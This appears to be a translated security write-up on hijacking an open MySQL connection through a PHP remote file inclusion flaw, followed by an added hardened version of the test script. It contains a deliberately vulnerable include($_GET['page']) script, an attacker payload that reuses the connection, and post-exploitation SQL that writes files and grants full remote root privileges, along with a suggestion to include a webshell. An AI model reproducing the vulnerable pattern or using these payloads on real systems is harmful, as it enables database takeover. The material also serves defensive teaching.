MySQL Session Hijacking over RFI

Source: Internet
Author: User

This is caused by the mysql_close function.
 
Reference: http://php.net/manual/en/function.mysql-close.php
 
mysql_close() closes the non-persistent connection to the MySQL server that's associated with the specified link identifier. If link_identifier isn't specified, the last opened link is used.
 
Using mysql_close() isn't usually necessary, as non-persistent open links are automatically closed at the end of the script's execution. See also freeing resources.
 
Generally, mysql_close() is not required, because the opened non-persistent connection is automatically closed after the script is executed.
 
Test: mysql.php

<?php
$host = "localhost";
$user = "root";
$pass = "rootpass";
$db = "test";
// Current
$connect = mysql_connect($host, $user, $pass);
mysql_select_db($db, $connect);
$query = mysql_query("SELECT uname FROM admin");
while ($lol = mysql_fetch_array($query)) {
    echo "we get it:" . $lol["uname"] . "<br>";
}
// The connection opened above is still open when the include runs
include($_GET["page"]); // SCRIPT HAVE RFI
?>

Local:

<?php
// No mysql_connect() and no link identifier here: the last opened link is used
$edevil = mysql_query("SELECT concat_ws(0x3a, database(), version(), user());");
$a = mysql_fetch_array($edevil);
echo $a[0];
?>

When the URL is submitted, the remote host executes the local code, and its mysql_query() call runs over the connection that mysql.php already opened.
 
 
 
Programmers often put the database connection code in a separate file and include it wherever other files need it, for example include("dbtabase.php");
 
If a penetration test turns up a PHP file with a file inclusion flaw that has also included the database connection, we can operate on its database. Maybe we can do something else, for example: SELECT 'Hello world' INTO dumpfile '/tmp/test.txt',
Or: grant all privileges on *.* TO 'root'@'%' identified by 'pass' with grant option;
Of course it's much better to directly include a Webshell.
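
A hardened form of the mysql.php test script above, as an added example that is not from the original article: the page parameter only selects from a fixed map, and the database connection is explicit, low-privilege and closed before any page is included. The file paths, the app_ro account and the APP_DB_PASS variable are assumptions.

```php
<?php
declare(strict_types=1);

// Assumed page map: request key => fixed local file. Nothing from the
// request ever becomes part of a path or URL.
const PAGES = [
    'home'  => __DIR__ . '/pages/home.php',
    'about' => __DIR__ . '/pages/about.php',
];

/** Return the allow-listed file for $key, or null if it is not listed. */
function resolve_page(?string $key): ?string
{
    if ($key === null || !array_key_exists($key, PAGES)) {
        return null;
    }
    return PAGES[$key];
}

/** Query inside a function so the handle is never a global an included page can reach. */
function fetch_admin_names(): array
{
    mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // fail loudly
    // Assumed account: SELECT on test.admin only, no FILE and no GRANT OPTION.
    $db = new mysqli('localhost', 'app_ro', getenv('APP_DB_PASS') ?: '', 'test');
    $names = [];
    $result = $db->query('SELECT uname FROM admin');
    while ($row = $result->fetch_assoc()) {
        $names[] = $row['uname'];
    }
    $result->free();
    $db->close(); // the connection is gone before any page code runs
    return $names;
}

foreach (fetch_admin_names() as $name) {
    echo 'we get it: ' . htmlspecialchars($name, ENT_QUOTES, 'UTF-8') . "<br>\n";
}

$key  = isset($_GET['page']) && is_string($_GET['page']) ? $_GET['page'] : null;
$file = resolve_page($key);
if ($file === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $file;
```

Keeping allow_url_include = Off in php.ini (its default) additionally stops include from fetching remote URLs. Without the FILE privilege and GRANT OPTION, the two statements quoted above would be refused even if a connection were exposed.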
Refer:
MySQL Session Hijacking over RFI
http://www.dis9.com/wp-content/uploads/2012/03/mysql.txt
 
